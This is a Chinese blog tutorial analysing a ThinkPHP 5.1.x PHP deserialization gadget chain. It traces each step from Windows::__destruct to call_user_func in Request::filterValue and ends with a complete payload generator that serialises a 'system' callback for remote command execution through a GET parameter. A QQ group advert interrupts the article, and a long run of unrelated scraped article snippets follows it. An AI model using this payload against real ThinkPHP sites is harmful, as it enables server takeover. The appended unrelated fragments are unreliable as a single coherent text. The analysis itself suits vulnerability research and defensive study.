程序媛的明天

ThinkPHP v5.1.x POP 链分析

环境：MacOS 10.13 MAMAP Prophp 7.0.33 + xdebugVisual Studio Code前言我所理解的 POP Chain：利用魔术方法并巧妙构造特殊属性调用一系列函数或类方法以执行某种敏感操作的调用堆栈反序列化常用魔法函数

前言
我所理解的 POP Chain：
利用魔术方法并巧妙构造特殊属性调用一系列函数或类方法以执行某种敏感操作的调用堆栈

反序列化常用魔法函数

 1 __wakeup， unserialize() 执行前调用
 2 __destruct， 对销毁的时候调用
 3 __toString， 类被当成字符串时的回应方法
 4 __construct()，当对象创建(new)时会自动调用，注意在
 5 unserialize()时并不会自动调用
 6 __sleep()，serialize()时会先被调用
 7 __call()，在对象中调用一个不可访问方法时调用
 8 __callStatic()，用静态方式中调用一个不可访问方法时调用
 9 __get()，获得一个类的成员变量时调用
10 __set()，设置一个类的成员变量时调用
11 __isset()，当对不可访问属性调用isset()或empty()时调用
12 __unset()，当对不可访问属性调用unset()时被调用。
13 __wakeup()，执行unserialize()时，先会调用这个函数
14 __toString()，类被当成字符串时的回应方法
15 __invoke()，调用函数的方式调用一个对象时的回应方法
16 __set_state()，调用var_export()导出类时，此静态方法会被调用。
17 __clone()，当对象复制完成时调用
18 __autoload()，尝试加载未定义的类
19 __debugInfo()，打印所需调试信息

phar 文件通过 phar:// 伪协议拓宽攻击面因为 phar 文件会以序列化的形式存储用户自定义的meta-data，所以在文件系统函数（file_exists()、is_dir()等）参数可控的情况下，配合phar://伪协议，可以不依赖unserialize()直接进行反序列化操作,深入了解请至：https://paper.seebug.org/680/

如果对反序列化没有了解的话建议先学习下相关内容ThinkPHP v5.1.x POP 链分析安装这里使用的是官方 ThinkPHP V5.1.38composer 部署composer create-project topthink/think=5.1.38 tp5.1.38利用链全局搜索函数 __destruct

来到 /thinkphp/library/think/process/pipes/Windows.php

 1 public function __destruct()
 2     {
 3         $this->close();
 4         $this->removeFiles();
 5     }
 6     . . .  . . . 
 7     /**
 8      * 删除临时文件
 9      */
10     private function removeFiles()
11     {
12         foreach ($this->files as $filename) {
13             if (file_exists($filename)) {
14                 @unlink($filename);
15             }
16         }
17         $this->files = [];
18     }

看下 file_exists 的描述f

```
1 ile_exists ( string $filename ) 
```

复制代码

: bool如果传入的 $filename 是个反序列化的对象，在被 file_exists 当作字符串处理的时候就会触发其 __toString 方法（如果有的话）所以下面就是找含 __toString 方法的类

来到 /thinkphp/library/think/model/concern/Conversion.php

1 public function toJson($options = JSON_UNESCAPED_UNICODE)
2     {
3         return json_encode($this->toArray(), $options);
4     }
5     . . .   . . . 
6     public function __toString()
7     {
8         return $this->toJson();
9     }

可以看到，在 toJson() 函数中又调用了 toArray() 函数如果 toArray() 函数中存在并使用某个可控变量的方法，那么我们就可以利用这点去触发其他类的 __call 方法下面是 toArray() 函数的定义，$this->append 作为类属性是可控的，所以 $relation 和 $name 也就可控了，于是 $relation->visible($name); 就成了这个 POP 链中的中间跳板

phper在进阶的时候总会遇到一些问题和瓶颈，业务代码写多了没有方向感，不知道该从那里入手去提升，对此我整理了一些资料，包括但不限于：分布式架构、高可扩展、高性能、高并发、服务器性能调优、TP6，laravel，YII2，Redis，Swoole、Kafka、Mysql优化、shell脚本、Docker、微服务、Nginx等多个知识点高级进阶干货需要的可以免费分享给大家，需要的（点击→）我的官方群677079770https://jq.qq.com/?_wv=1027&k=5BoEMVl

 1 public function toArray()
 2 {
 3     $item       = [];
 4     $hasVisible = false;
 5     . . .   . . .
 6     // 追加属性（必须定义获取器）
 7     if (!empty($this->append)) {
 8         foreach ($this->append as $key => $name) {
 9             if (is_array($name)) {
10                 // 追加关联对象属性
11                 $relation = $this->getRelation($key);
12                 if (!$relation) {
13                     $relation = $this->getAttr($key);
14                     if ($relation) {
15                         $relation->visible($name);
16                     }
17                 }
18                 $item[$key] = $relation ? $relation->append($name)->toArray() : [];
19             } elseif (strpos($name, '.')) {
20            . . .   . . .   
21             } else {
22                 $item[$name] = $this->getAttr($name, $item);
23             }
24         }
25     }
26     return $item;
27 }

那我们在这里应该传入怎么样的值以及什么数据呢，先看下 $relation 是如何处理得到的

跟进 getRelation，在 /thinkphp/library/think/model/concern/RelationShip.php 中找到函数定义

 1 trait RelationShip
 2 {
 3     . . .   . . . 
 4     /**
 5      * 获取当前模型的关联模型数据
 6      * @access public
 7      * @param  string $name 关联方法名
 8      * @return mixed
 9      */
10     public function getRelation($name = null)
11     {
12         if (is_null($name)) {
13             return $this->relation;
14         } elseif (array_key_exists($name, $this->relation)) {
15             return $this->relation[$name];
16         }
17         return;
18     }
19     . . .   . . . 
20 }

由于 getRelation 最终都会 return; 导致返回 NULL，所以下面的 if (!$relation) 一定成立所以直接跟进后面的 getAttr，在 /thinkphp/library/think/model/concern/Attribute.php 找到其定义

 1 trait Attribute
 2 {
 3     . . .   . . .
 4     public function getData($name = null)
 5     {
 6         if (is_null($name)) {
 7             return $this->data;
 8         } elseif (array_key_exists($name, $this->data)) {
 9             return $this->data[$name];
10         } elseif (array_key_exists($name, $this->relation)) {
11             return $this->relation[$name];
12         }
13         throw new InvalidArgumentException('property not exists:' . static::class . '->' . $name);
14     }
15     . . .   . . . 
16     public function getAttr($name, &$item = null)
17     {
18         try {
19             $notFound = false;
20             $value    = $this->getData($name);
21         } catch (InvalidArgumentException $e) {
22             $notFound = true;
23             $value    = null;
24         }
25         . . .  . . . 
26     }
27 }

从 getAttr ---> getData 返回 data 数组中同名键值的元素值，即 $relation <---- $this->data[$name]，我们需要的 $data 和 $append 分别位于 Attribute 和 Conversion，且两者都是 trait 类型Trait 可以说是和 Class 相似，是 PHP 5.4.0 开始实现的一种代码复用的方法，可以使用 use 加载

详情可以看官方手册 PHP: Trait - Manual

所以接下来是寻找一个同时使用了 Attribute 和 Conversion 的类

发现只有 /thinkphp/library/think/Model.php 满足条件

1 abstract class Model implements \JsonSerializable, \ArrayAccess
2 {
3     use model\concern\Attribute;
4     use model\concern\RelationShip;
5     use model\concern\ModelEvent;
6     use model\concern\TimeStamp;
7     use model\concern\Conversion;
8     . . .   . . .
9 }

下面就需要找到一个没有 visible 方法却有 __call 方法的类作为执行点找到 /thinkphp/library/think/Request.php 中的 Request 类

 1 class Request
 2 {
 3     . . .   . . . 
 4     /**
 5      * 扩展方法
 6      * @var array
 7      */
 8     protected $hook = [];
 9     . . .   . . . 
10     public function __call($method, $args)
11     {
12         if (array_key_exists($method, $this->hook)) {
13             array_unshift($args, $this);
14             return call_user_func_array($this->hook[$method], $args);
15         }
16         throw new Exception('method not exists:' . static::class . '->' . $method);
17     }
18     . . .   . . .
19 }

这里的回调参数来源于 $hook 数组，而且方法名和参数都是可控的，不过 array_unshift 函数会把若干元素前置到数组的开头

 1  $queue = array("orange", "banana");
 2 array_unshift($queue, "apple", "raspberry");
 3 print_r($queue);
 4 ///
 5 Array
 6 (
 7     [0] => apple
 8     [1] => raspberry
 9     [2] => orange
10     [3] => banana
11 )

这样的话明显就很难执行命令了，因为参数数组的第一个元素始终是 $this，无法直接执行我们想要的命令，需要其他某种对参数不是这么敏感的函数作为一个新的执行点或者跳板Request 类中有一个 filterValue 函数具有过滤功能，寻找调用 filterValue 的地方以便控制 $value 和 $filters 好执行命令

 1 private function filterValue(&$value, $key, $filters)
 2     {
 3         $default = array_pop($filters);
 4         foreach ($filters as $filter) {
 5             if (is_callable($filter)) {
 6                 // 调用函数或者方法过滤
 7                 $value = call_user_func($filter, $value);
 8             } elseif (is_scalar($value)) {
 9              . . .   . . .         
10              }
11         return $value;
12     }

Request 类中的 input 函数由 array_walk_recursive 调用了 filterValue，但是参数仍不可控，再往上寻找调用点看看

 1 public function input($data = [], $name = '', $default = null, $filter = '')
 2     {
 3         if (false === $name) {
 4             // 获取原始数据
 5             return $data;
 6         }
 7         $name = (string) $name;
 8         if ('' != $name) {
 9             // 解析name
10             if (strpos($name, '/')) {
11                 list($name, $type) = explode('/', $name);
12             }
13             $data = $this->getData($data, $name);
14             if (is_null($data)) {
15                 return $default;
16             }
17             if (is_object($data)) {
18                 return $data;
19             }
20         }
21         // 解析过滤器
22         $filter = $this->getFilter($filter, $default);
23         if (is_array($data)) {
24             array_walk_recursive($data, [$this, 'filterValue'], $filter);
25             if (version_compare(PHP_VERSION, '7.1.0', '<')) {
26                 // 恢复PHP版本低于 7.1 时 array_walk_recursive 中消耗的内部指针
27                 $this->arrayReset($data);
28             }
29         } else {
30             $this->filterValue($data, $name, $filter);
31         }
32         . . .   . . . 
33         return $data;
34     }

复制代码

Request 类中的 param 函数调用了 input 函数，但同样参数不可控，再往上寻找调用点

 1 public function param($name = '', $default = null, $filter = '')
 2     {
 3         . . .   . . .
 4         if (true === $name) {
 5             // 获取包含文件上传信息的数组
 6             $file = $this->file();
 7             $data = is_array($file) ? array_merge($this->param, $file) : $this->param;
 8             return $this->input($data, '', $default, $filter);
 9         }
10         return $this->input($this->param, $name, $default, $filter);
11     }

转到 isAjax 函数的定义

 1 public function isAjax($ajax = false)
 2     {
 3         $value  = $this->server('HTTP_X_REQUESTED_WITH');
 4         $result = 'xmlhttprequest' == strtolower($value) ? true : false;
 5         if (true === $ajax) {
 6             return $result;
 7         }
 8         $result           = $this->param($this->config['var_ajax']) ? true : $result;
 9         $this->mergeParam = false;
10         return $result;
11     }

这里 $ajax 参数没有对类型的限制，而且 param 的参数来自 $this->config，是可控的，param 在最后所调用的 input 函数的 $this->param, $name 就都可控跟进 get 和 route 函数不难发现 $this->param 的值来自 GET 请求

1 // 当前请求参数和URL地址中的参数合并
2 $this->param = array_merge($this->param, $this->get(false), $vars, $this->route(false));
3 /*
4 http://127.0.0.1:9000/public/?test=pwd
5 $this->param = array("test"=>"pwd")
6 */

那么回到 input 函数看处理流程

首先 $this->getData($data, $name) 得到 $data，跟进分析，返回 $data 为 $data[$val] 的值，即 $data[$name]

 1 protected function getData(array $data, $name)
 2     {
 3         foreach (explode('.', $name) as $val) {
 4             if (isset($data[$val])) {
 5                 $data = $data[$val];
 6             } else {
 7                 return;
 8             }
 9         }
10         return $data;
11     }

回到 input，接着处理 $filter = $this->getFilter($filter, $default);getFilter 的两个参数分别为 '' 和 null 且都不可控，但是跟进不难看出最后返回 $filter 的值就是 $this->filter，虽然后面 $filter[] = $default; 会给 filter 数组追加个值为 null 的元素，但后面 filterValue 中的 array_pop 函数正好给去掉了

 1 protected function getFilter($filter, $default)
 2     {
 3         if (is_null($filter)) {
 4             $filter = [];
 5         } else {
 6             $filter = $filter ?: $this->filter;
 7             if (is_string($filter) && false === strpos($filter, '/')) {
 8                 $filter = explode(',', $filter);
 9             } else {
10                 $filter = (array) $filter;
11             }
12         }
13         $filter[] = $default;
14         return $filter;
15     }

这样就得到一条可控变量的函数调用链，最后执行命令

下面简单梳理下流程通过 Windows 类 __destruct() 方法调用到 file_exists 触发某类的 __toString() 来到 toArray() 函数通过控制分别位于 Attribute 和 Conversion 的 $data 和 $append 变量执行在 Request 中不存在的 visible 函数进而触发其 __call() 在 Request 通过控制 $hook $filter $config 三个变量的值注入最终的 callback 名称和参数，再经这么一系列函数调用执行命令

1 __call() ---> call_user_func_array() ---> isAjax() ---> param() ---> input() ---> filterValue() ---> call_user_func()

构造 Payload

由于 Model 类是 abstract 类型，无法实例化，而extends Model 的也只有一个 Pivot 类，所以就用它吧

 1 php
 2 namespace think;
 3 abstract class Model
 4 {
 5     protected $append = [];
 6     private $data = [];
 7     function __construct(){
 8         $this->append = ["a"=>[""]];
 9         $this->data = ["a"=>new Request()];
10     }
11 }
12 namespace think\model;
13 use think\Model;
14 class Pivot extends Model
15 {
16 }
17 namespace think\process\pipes;
18 use think\model\Pivot;
19 class Windows
20 {
21     private $files = [];
22     public function __construct()
23     {
24         $this->files = [new Pivot()];
25     }
26 }
27 namespace think;
28 class Request
29 {
30     protected $hook = [];
31     protected $filter = "system";
32     protected $config = [
33         // 表单请求类型伪装变量
34         'var_method'       => '_method',
35         // 表单ajax伪装变量
36         'var_ajax'         => '_ajax',
37         // 表单pjax伪装变量
38         'var_pjax'         => '_pjax',
39         // PATHINFO变量名 用于兼容模式
40         'var_pathinfo'     => 's',
41         // 兼容PATH_INFO获取
42         'pathinfo_fetch'   => ['ORIG_PATH_INFO', 'REDIRECT_PATH_INFO', 'REDIRECT_URL'],
43         // 默认全局过滤方法 用逗号分隔多个
44         'default_filter'   => '',
45         // 域名根，如thinkphp.cn
46         'url_domain_root'  => '',
47         // HTTPS代理标识
48         'https_agent_name' => '',
49         // IP代理获取标识
50         'http_agent_ip'    => 'HTTP_X_REAL_IP',
51         // URL伪静态后缀
52         'url_html_suffix'  => 'html',
53     ];
54     function __construct(){
55         $this->filter = "system";
56         $this->config = ["var_ajax"=>''];
57         $this->hook = ["visible"=>[$this,"isAjax"]];
58     }
59 }
60 use think\process\pipes\Windows;
61 echo base64_encode(serialize(new Windows()));

自己先构造一个利用点反序列化我们的内容，生成好 payload，GET 传入要执行的命令，命令别忘了 urlencode

查看调用堆栈

一文掌握python常用的list（列表）操作程序员neil python python 开发语言
目录一、创建列表1.直接创建列表：2.使用list()构造器3.使用列表推导式4.创建空列表二、访问列表元素1.列表支持通过索引访问元素，索引从0开始：2.还可以使用切片操作访问列表的一部分：三、修改列表元素四、添加元素1.append()：在末尾添加元素2.insert()：在指定位置插入元素五、删除元素1.del：删除指定位置的元素2.remove()：删除指定值的第一个匹配项3.pop()：
python结束子进程_如何清除python中的子进程 weixin_39995943 python结束子进程
我们使用python进程来管理长时间运行的python子进程。有时需要终止子进程。kill命令不会完全终止进程，只会使其失效。运行以下脚本将演示此行为。importsubprocessp=subprocess.Popen(['sleep','400'],stdout=subprocess.PIPE,shell=False)或者p=subprocess.Popen('sleep400',stdout
el-table实现全选整表，单元一页复选框功能周bro vue.js elementui javascript 前端
全选整表单选一页0":popper-append-to-body="false":total="tableData.length":page-size="pageObj.pagesize":page-sizes="[10,50,100]"layout="total,sizes,prev,pager,next"@size-change="handleSizeChange"@current-chang
网关gateway学习总结猪猪365 学习总结学习总结
一微服务概述:微服务网关就是一个系统!通过暴露该微服务的网关系统,方便我们进行相关的鉴权,安全控制,日志的统一处理,易于监控的相关功能!实现微服务网关技术都有哪些呢?1nginx:nginx是一个高性能的http和反向代理web的服务器,同事也提供了IMAP/POP3/SMTP服务.他可以支撑5万并发链接,并且cpu,内存等资源消耗非常的低,运行非常的稳定!2Zuul:Zuul是Netflix公司
Nginx：高性能的Web服务器与反向代理张某布响丸辣 nginx 前端服务器 java SpringBoot
在当今的互联网世界中，Web服务器的选择对于网站的性能、稳定性和安全性至关重要。Nginx（发音为“engineX”）凭借其卓越的性能、丰富的功能集和灵活的配置选项，成为了众多网站和应用程序的首选Web服务器和反向代理。本文将深入探讨Nginx的特点、应用场景、基本配置以及它如何助力你的Web项目。Nginx简介Nginx是一个开源的、高性能的HTTP和反向代理服务器，也是一个IMAP/POP3/
Nginx Hard模式西木风落中间组件 Nginx Nginx配置详解 Nginx配置优化 Nginx面试hard
一、Nginx简介1.Nginx概述Nginx是一个免费、开源、高性能、轻量级的HTTP和反向代理服务器，也是一个电子邮件（IMAP/POP3）代理服务器。其特点是能支持高并发请求处理，并且占用较少的内存资源，提供稳定的、丰富的模块库，有很高的配置灵活性。目前，几乎所有的web项目，都配有Nginx。Nginx由内核和一系列模块组成，内核提供Web服务的基本功能，启用网路协议、提供运行环境、创建连
内网穿透之EW使用、判断服务器是否出网板栗妖怪学习内网渗透
环境搭建使用的是下面文章的环境记一次学习--内网穿透-CSDN博客ew代理然后同样通过thinkphp漏洞写入文件，然后通过蚁剑连接然后上传ew的Linux版本，然后加权执行一层代理正向代理设置正向代理（在ubuntu上），然后kali在proxychain配置文件中连接ubuntu的192.168.244.154的代理端口反向代理在ubuntu上设置反向代理，将连接反弹到kali上的某个端口。然
python基于django/flask的NBA球员大数据分析与可视化python+java+node.js QQ_511008285 python django flask java spring boot 数据分析
前端开发框架:vue.js数据库mysql版本不限后端语言框架支持：1java(SSM/springboot)-idea/eclipse2.Nodejs+Vue.js-vscode3.python(flask/django)--pycharm/vscode4.php(thinkphp/laravel)-hbuilderx数据库工具：Navicat/SQLyog等都可以本文针对NBA球员的大数据进行
Java基于spring boot的国产电影数据分析与可视化python+java+node.js QQ_511008285 java spring boot 数据分析 python django vue.js flask
前端开发框架:vue.js数据库mysql版本不限后端语言框架支持：1java(SSM/springboot)-idea/eclipse2.Nodejs+Vue.js-vscode3.python(flask/django)--pycharm/vscode4.php(thinkphp/laravel)-hbuilderx数据库工具：Navicat/SQLyog等都可以该系统使用进行大数据处理和
栈区-----顺序栈------队列 (笑)z 数据结构
栈栈（Stack）是一种遵循后进先出（LIFO,LastInFirstOut）原则的有序集合。这种数据结构只允许在栈顶进行添加（push）或删除（pop）元素的操作。换句话说，最新添加的元素会被最先移除。栈的这种特性使得它在多种编程和应用场景中非常有用，比如函数调用、括号匹配、表达式求值、页面访问历史等。只允许从一端进行数据的插入和删除的线性存储结构顺序栈：类似数组满增栈，满减栈，空增栈，空减栈空
python 卡方检验_Python-卡方检验 cunzai1985 python numpy 数据分析机器学习数据挖掘
python卡方检验Python-卡方检验(Python-Chi-SquareTest)Chi-Squaretestisastatisticalmethodtodetermineiftwocategoricalvariableshaveasignificantcorrelationbetweenthem.Boththosevariablesshouldbefromsamepopulationand
【WPF】Popup的使用 wangnaisheng C#WPF wpf c#
WPF（WindowsPresentationFoundation）中的Popup控件用于创建弹出窗口，如工具提示、上下文菜单等。Popup控件本身并不直接显示任何内容，它需要一个子元素来显示实际的内容。以下是一个简单的XAML示例，展示如何创建一个点击按钮后出现的弹出窗口：1.前台界面2.后台逻辑需要为按钮的点击事件编写处理程序，以控制Popup的打开和关闭状态：usingSystem.Wind
pytorch安装(windows) m0_62244898 windows 人工智能
（1）下载pycharmPyCharm:thePythonIDEforProfessionalDevelopersbyJetBrains(2)下载anacondaAnaconda|TheWorld'sMostPopularDataSciencePlatform(3)创建一个新环境：torchcondacreate-ntorch-y(4)进入新环境condaactivatetorch(5)加入清华源
java迷宫问题华为_深度优先搜索——迷宫问题（华为oj）刘洛希 java迷宫问题华为
题目描述：定义一个二维数组N*M(其中2=n)38continue;39if(a[tx][ty]==0&&book[tx][ty]==0)40{41xy.x=tx;42xy.y=ty;43way.push_back(xy);44book[tx][ty]=1;45dfs(tx,ty,step+1);46book[tx][ty]=0;47way.pop_back();48}49}50return0;5
【C++】手把手教你写出自己的vector类 Ornamrr C++c++vector
在上一篇博客中，我们学习了vector的基本使用，以及迭代器的失效问题：【C++】深入理解vector类(一)今天我们来模拟实现以下vector类。目录成员变量接口实现构造函数迭代器拷贝构造赋值reserveresizepush_backpop_back实现[]访问成员变量我们先从原码中找出其成员变量：可以看到，原码中有三个成员变量：startfinishend_of_storage数据类型是it
iOS—push和present区别（含dismiss多级的方法） Fttt.
push和present都可以推出新的页面，present推出的是模态视图。present一般用于不同业务界面的切换，push一般用于同一业务不同界面之间的切换present与dismiss对应，push和pop对应。present只能逐级返回，push所有视图由视图栈控制，可以返回上一级，也可以返回到根视图、其他视图。push方法NextViewController*next=[[NextVie
JavaScript数组操作方法柒一柒
JavaScript数组操作方法常见的一些数组操作push、pop、unshift、shiftpush语法:array.push(item1,item2,…,itemX)push()方法：可以将一个或者更多的参数添加在数组的尾部；返回添加后的数组的长度，原数组发生改变。代码示例如下：vararr=[1,2,3,4];vara=arr.push(9,8,7);console.log(a,arr);/
【前端UI框架】VUE ElementUI 离线文档可不联网打开我是Superman丶前端组件前端 vue.js elementui
【前端UI框架】VUEElementUI离线文档可不联网打开Element-Theworld'smostpopularVueUIframeworkElement-Theworld'smostpopularVueUIframework离线文档下载地址https://download.csdn.net/download/G971005287W/89742895文档制作第一步:克隆源代码Gitee地址:
遗传算法（Genetic Algorithm,GA）-基于MATLAB环境实现朱佩棋（代码版）启发式算法启发式算法算法 matlab
1.GA简介geneticalgorithm，美国Holland教授创立，基于达尔文进化论和孟德尔的遗传学说。遗传算法类比了生物界中自然选择、交叉、变异等自然进化方式，利用数码串类比染色体，通过选择、交叉、变异等遗传算子模拟生物的进化过程。1.1遗传算法的流程1.编码伪代码：2.产生初始群体Chooseinitialpopulation3.计算适应度Evaluatethefitnessofeach
面向对象和面向过程（详解）姜太公钓鲸233 c++开发语言
面向对象编程（OOP）和面向过程编程（POP）是两种不同的编程范式，它们在组织代码和解决问题的方式上有着显著的区别。面向过程（ProcedureOriented简称PO）：把事情拆分成几个步骤（相当于拆分成一个个的方法和数据），然后按照一定的顺序执行。面向对象（ObjectOriented简称OO）：面向对象会把事物抽象成对象的概念，先抽象出对象，然后给对象赋一些属性和方法，然后让每个对象去执行自
鸿蒙 - 数组常用的API �皓月�488 前端鸿蒙开发语言
push()-在数组末尾添加一个或多个元素，并返回新的长度。pop()-删除数组的最后一个元素，并返回那个元素。shift()-删除数组的第一个元素，并返回那个元素。unshift()-在数组的开始添加一个或多个元素，并返回新的长度。slice()-返回数组的一个浅拷贝。splice()-通过删除现有元素和/或添加新元素来更改一个数组的内容。concat()-连接两个或更多数组，并返回一个新数组。
List集合特点，遍历方式，ArrayList（去重原理，增长因子论，LinkedList) 2401_86367086 面试辅导大厂内推 list windows 数据结构
for(inti=0;i();Dld=newDl(list);d.push(“a”);d.push(“b”);d.push(“c”);/**队列的特点先进先出一次只能取一个堆栈的特点反向输出*/System.out.println(d.pop());System.out.println(d.pop());System.out.println(d.pop());}}//队列classDl{Linke
Python 数据类型详解：列表、字典、元组与集合的操作指南敲代码不忘补水 Python 编码 python windows 开发语言
Python数据类型详解：列表、字典、元组与集合的操作指南文章目录Python数据类型详解：列表、字典、元组与集合的操作指南一List列表1获取List中多个数据2修改List对应位置的数据3List列表中的存储类型4其他功能1）扩充入另一个列表2）按位置添加3）移除某索引4）移除某值二Dict字典1其他功能1）按key获取对应的value2）将另一个字典补充到当前字典3）pop调一个item，和
synonym 11.08 rubine_zdy
翻译：MujihasbeenasynonymforMinimalismandstraightdesign.例子：JayChouhasbeenasynonymforpopularmusicamongthosepost-90s’.
Thinkphp中where()条件的使用 2401_84875852 程序员服务器 java 网络
|notin|notin|$map[‘id’]=array(‘notin’,‘1,5,8’);|idnotin(1,5,8)||and（默认）|and|$map[‘id’]=array(array(‘gt’,1),array(‘lt’,10));|(id>1)AND(id3)OR(idwhere(User->where(User−>where(map)->select();相当于sql语句：nam
python调用shell命令-「Python」6种python中执行shell命令方法 weixin_37988176
用Python调用Shell命令有如下几种方式：第一种：os.system("Thecommandyouwant").这个调用相当直接，且是同步进行的，程序需要阻塞并等待返回。返回值是依赖于系统的，直接返回系统的调用返回值，所以windows和linux是不一样的。第二种：os.popen(command[,mode[,bufsize]])先给大家看个例子可以看出，popen方法通过p.read(
晓思的ScalersTalk第六轮《新概念》朗读持续力训练Day63—20210301 XS_XS
【练习材料】(喜马拉雅新概念英音第二册)☞原文Lesson63ShewasnotamusedJeremyHampdenhasalargecircleoffriendsandisverypopularatparties.Everybodyadmireshimforhisgreatsenseofhumor--everybody,thatis,excepthissix-year-olddaughter,
顺序表(SequenceList)数据结构的基本操作实现详解 SuchABigBug C语言数据结构链表 c语言
目录一、前言二、整体设计框架三、函数实现1.SeqListInit2.SeqListDestory3.SeqListCheckCapacity4.SeqListPushBack(尾插)5.SeqListPopBack(尾删)6.SeqListPushFront(头插)7.SeqListPopFront(头删)8.SeqlistFind9.SeqListInsert(任意位置插入)9.SeqList
Nginx 砌月东谷
一、Nginx简介1.Nginx是什么？?Nginx(enginex)是一个高性能的HTTP和反向代理服务器，也是一个IMAP/POP3/SMTP服务器?Nginx可以作为一个Web服务器进行网站的发布，也可以作为反向代理服务器进行负载均衡的实现?常见的Web服务器：Tomcat、Apache、Nginx、Weblogic等2.特点占用内存少、并发能力强二、搭建Nginx环境1.安装nginx?两
夸夸我的同事天父的娜娜宝贝
今天晚上特别开心，虽然我一个家长也没到场全都请假了。因为突然认识到原来上帝把我放在一群宝贝中间。晚上Popy上的体验课，虽然是她第二次上课，但是真的超级棒。因为精彩的课程，来的家长和小孩子都很满意，自然报名也不错。Popy性格特别阳光自信，下午陪她练课的时候忍不住想夸她，不过我知道那是她生命本真的流露，就是发自内心的超级自信和有安全感。这个小女孩真好。虽然有点可惜可能她没办法久干，但是希望她在这里
scala的option和some 矮蛋蛋编程 scala
原文地址： http://blog.sina.com.cn/s/blog_68af3f090100qkt8.html 对于学习 Scala 的 Java™ 开发人员来说，对象是一个比较自然、简单的入口点。在本系列前几期文章中，我介绍了 Scala 中一些面向对象的编程方法，这些方法实际上与 Java 编程的区别不是很大。我还向您展示了 Scala 如何重新应用传统的面向对象概念，找到其缺点
NullPointerException Cb123456 android BaseAdapter
java.lang.NullPointerException: Attempt to invoke virtual method 'int android.view.View.getImportantForAccessibility()' on a null object reference 出现以上异常.然后就在baidu上
PHP使用文件和目录天子之骄 php文件和目录读取和写入 php验证文件 php锁定文件
PHP使用文件和目录 1.使用include()包含文件 (1)：使用include()从一个被包含文档返回一个值 (2)：在控制结构中使用include() include_once()函数需要一个包含文件的路径，此外，第一次调用它的情况和include()一样，如果在脚本执行中再次对同一个文件调用，那么这个文件不会再次包含。在php.ini文件中设置
SQL SELECT DISTINCT 语句何必如此 sql
SELECT DISTINCT 语句用于返回唯一不同的值。 SQL SELECT DISTINCT 语句在表中，一个列可能会包含多个重复值，有时您也许希望仅仅列出不同（distinct）的值。 DISTINCT 关键词用于返回唯一不同的值。 SQL SELECT DISTINCT 语法 SELECT DISTINCT column_name,column_name F
java冒泡排序 3213213333332132 java 冒泡排序
package com.algorithm; /** * @Description 冒泡 * @author FuJianyong * 2015-1-22上午09:58:39 */ public class MaoPao { public static void main(String[] args) { int[] mao = {17,50,26,18,9,10
struts2.18 +json,struts2-json-plugin-2.1.8.1.jar配置及问题！ 7454103 DAO spring Ajax json qq
struts2.18 出来有段时间了！（貌似是稳定版）闲时研究下下！貌似 sruts2 搭配 json 做 ajax 很吃香！实践了下下！不当之处请绕过！呵呵网上一大堆 struts2+json 不过大多的json 插件都是 jsonplugin.34.jar strut
struts2 数据标签说明 darkranger jsp bean struts servlet Scheme
数据标签主要用于提供各种数据访问相关的功能，包括显示一个Action里的属性，以及生成国际化输出等功能数据标签主要包括： action ：该标签用于在JSP页面中直接调用一个Action，通过指定executeResult参数，还可将该Action的处理结果包含到本页面来。 bean ：该标签用于创建一个javabean实例。如果指定了id属性，则可以将创建的javabean实例放入Sta
链表.简单的链表节点构建 aijuans 编程技巧
/*编程环境WIN-TC*/ #include "stdio.h" #include "conio.h" #define NODE(name, key_word, help) \ Node name[1]={{NULL, NULL, NULL, key_word, help}} typedef struct node { &nbs
tomcat下jndi的三种配置方式 avords tomcat
jndi(Java Naming and Directory Interface，Java命名和目录接口)是一组在Java应用中访问命名和目录服务的API。命名服务将名称和对象联系起来，使得我们可以用名称访问对象。目录服务是一种命名服务，在这种服务里，对象不但有名称，还有属性。 tomcat配置
关于敏捷的一些想法 houxinyou 敏捷
从网上看到这样一句话：“敏捷开发的最重要目标就是：满足用户多变的需求，说白了就是最大程度的让客户满意。” 感觉表达的不太清楚。感觉容易被人误解的地方主要在“用户多变的需求”上。第一种多变，实际上就是没有从根本上了解了用户的需求。用户的需求实际是稳定的，只是比较多，也比较混乱，用户一般只能了解自己的那一小部分，所以没有用户能清楚的表达出整体需求。而由于各种条件的，用户表达自己那一部分时也有
富养还是穷养，决定孩子的一生 bijian1013 教育人生
是什么决定孩子未来物质能否丰盛？为什么说寒门很难出贵子，三代才能出贵族？真的是父母必须有钱，才能大概率保证孩子未来富有吗？-----作者：@李雪爱与自由事实并非由物质决定，而是由心灵决定。一朋友富有而且修养气质很好，兄弟姐妹也都如此。她的童年时代，物质上大家都很贫乏，但妈妈总是保持生活中的美感，时不时给孩子们带回一些美好小玩意，从来不对孩子传递生活艰辛、金钱来之不易、要懂得珍惜
oracle 日期时间格式转化征客丶 oracle
oracle 系统时间有 SYSDATE 与 SYSTIMESTAMP； SYSDATE：不支持毫秒，取的是系统时间； SYSTIMESTAMP：支持毫秒，日期，时间是给时区转换的，秒和毫秒是取的系统的。日期转字符窜：一、不取毫秒： TO_CHAR(SYSDATE, 'YYYY-MM-DD HH24:MI:SS') 简要说明， YYYY 年 MM 月
【Scala六】分析Spark源代码总结的Scala语法四 bit1129 scala
1. apply语法 FileShuffleBlockManager中定义的类ShuffleFileGroup，定义： private class ShuffleFileGroup(val shuffleId: Int, val fileId: Int, val files: Array[File]) { ... def apply(bucketId
Erlang中有意思的bug bookjovi erlang
代码中常有一些很搞笑的bug，如下面的一行代码被调用两次（Erlang beam） commit f667e4a47b07b07ed035073b94d699ff5fe0ba9b Author: Jovi Zhang <[email protected]> Date: Fri Dec 2 16:19:22 2011 +0100 erts:
移位打印10进制数转16进制-2008-08-18 ljy325 java 基础
/** * Description 移位打印10进制的16进制形式 * Creation Date 15-08-2008 9:00 * @author 卢俊宇 * @version 1.0 * */ public class PrintHex { // 备选字符 static final char di
读《研磨设计模式》-代码笔记-组合模式 bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; abstract class Component { public abstract void printStruct(Str
利用cmd命令将.class文件打包成jar chenyu19891124 cmd jar
cmd命令打jar是如下实现：在运行里输入cmd，利用cmd命令进入到本地的工作盘符。(如我的是D盘下的文件有此路径 D:\workspace\prpall\WEB-INF\classes) 现在是想把D:\workspace\prpall\WEB-INF\classes路径下所有的文件打包成prpall.jar。然后继续如下操作： cd D: 回车 cd workspace/prpal
[原创]JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 comsci eclipse 设计模式算法工作 swing
JWFD v0.96 工作流系统二次开发包 for Eclipse 简要说明 &nb
